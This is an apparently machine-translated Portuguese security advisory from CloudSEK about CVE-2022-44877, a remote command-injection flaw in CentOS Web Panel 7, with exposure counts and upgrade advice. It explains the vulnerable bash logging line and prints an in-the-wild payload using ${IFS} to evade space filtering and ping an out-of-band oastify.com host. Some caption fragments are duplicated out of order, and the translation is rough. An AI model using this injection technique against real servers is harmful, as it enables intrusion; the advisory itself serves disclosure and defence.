🚀 A CloudSEK se torna a primeira empresa de segurança cibernética de origem indiana a receber investimentos da Estado dos EUA fundo
Leia mais
Categoria:
Inteligência de vulnerabilidadeClasse de vulnerabilidade:
Execução remota de códigoID DA CAVERNA:
CVE-2022-44877CVSS: 3.0 Pontuação:
NA (não atribuído)
Ilustração de 2 conchas [/caption]
Existem vários servidores vulneráveis à solta e os agentes de ameaças começaram a explorá-los usando a carga útil de exploração mencionada abaixo.
[caption id="attachment_22207" align="alignnone” width="1218"]
A carga útil da amostra [/caption]
Entendendo a carga
Recebemos a seguinte interação de DNS do servidor vulnerável [/caption]
Consulta de pesquisa do Shodan mostrando servidores vulneráveis [/caption]
O mesmo padrão também pode ser observado em outros mecanismos de pesquisa, como Censo.
[caption id="attachment_22210" align="alignnone” width="1582"]
Consulta de pesquisa do Censys mostrando servidores vulneráveis [/caption]
Sumário executivo
AMEAÇAIMPACTOMITIGAÇÃO- Uma nova vulnerabilidade de execução remota de comandos foi encontrada no portal de gerenciamento web do painel web 7 do Centos (Control).
- Um agente de ameaças pode facilmente explorar a vulnerabilidade com uma solicitação HTTP criada.
- A vulnerabilidade pode ser aproveitada para obter um shell reverso e manter a persistência.
- Um agente de ameaças remoto não autenticado pode realizar ataques de ransomware ou exfiltrar dados.
- Atualize para a versão mais recente pois isso afeta o Centos Web Panel 7 < v0.9.8.1147
- A versão mais recente - v0.9.8.1148
Investigação e análise
CloudSEKA equipe de pesquisa de ameaças da conduziu uma investigação para entender os detalhes técnicos do CVE-2022-44877 e a exploração das instalações do CentOS Web Panel 7 em toda a Internet. Durante nossa pesquisa, descobrimos que, após a exploração, um invasor pode executar comandos remotamente no mesmo nível de privilégio em que o CentOS Web Panel está instalado. Em vários casos, foi identificado que o privilégio padrão para hospedar a instalação era 'raiz' que é equivalente ao 'Administrador' privilégio no Windows.Análise técnica - Código de prova de conceito
Um pesquisador de segurança lançou o POC em github e um vídeo POC em Youtube em 5 de janeiro de 2023, após obter a garantia da equipe do Centos de que um número suficiente de servidores foi corrigido. Após a análise do código de exploração compartilhado, foi identificado que a falha residia na funcionalidade que registrava entradas incorretas no painel. A seguir está um exemplo de trecho de código responsável por escrever conteúdo no nome do arquivo”wrong_entry.log” echo “incorrect_entry, endereço IP, http_request_URI” >>. /wrong_entry.log As aspas duplas no comando acima são responsáveis por essa configuração incorreta, pois esse é um recurso do bash que ajuda a executar um comando. Como o HTTP_Request_URI é controlado pelo atacante, um Threat Actor pode inserir um comando que é executado no servidor. Quando o comando acima é executado, obtemos uma conexão de volta com o shell do ouvinte. [caption id="attachment_22206" align="alignnone” width="1115"] Ilustração de 2 conchas [/caption]
Existem vários servidores vulneráveis à solta e os agentes de ameaças começaram a explorá-los usando a carga útil de exploração mencionada abaixo.
[caption id="attachment_22207" align="alignnone” width="1218"] A carga útil da amostra [/caption]
Entendendo a carga- ping$ {IFS} -nc$ {IFS} 2$ {IFS} 222gmd8w98u9qwf7x5z7kw73quwlkd82.oastify.com pode ser simplificado para ping -nc 2 222gmd8w98u9qwf7x5z7kw73quwlkd82.oastify.com
- O $ {IFS} é uma variável bash para fornecer um caractere de espaço. Isso é usado para ignorar a verificação de caracteres inválidos de espaço em branco.
- Portanto, estamos tentando obter um pingback do servidor vulnerável.
Recebemos a seguinte interação de DNS do servidor vulnerável [/caption]
Informações do OSINT - Explorabilidade e presença
O Centos Web Panel 7 é uma ferramenta de gerenciamento de servidores amplamente usada. Uma consulta do Shodan resulta em aproximadamente 436.000 servidores que podem ser potencialmente vulneráveis à vulnerabilidade de execução remota de código. [caption id="attachment_22209" align="alignnone” width="1681"] Consulta de pesquisa do Shodan mostrando servidores vulneráveis [/caption]
O mesmo padrão também pode ser observado em outros mecanismos de pesquisa, como Censo.
[caption id="attachment_22210" align="alignnone” width="1582"] Consulta de pesquisa do Censys mostrando servidores vulneráveis [/caption]
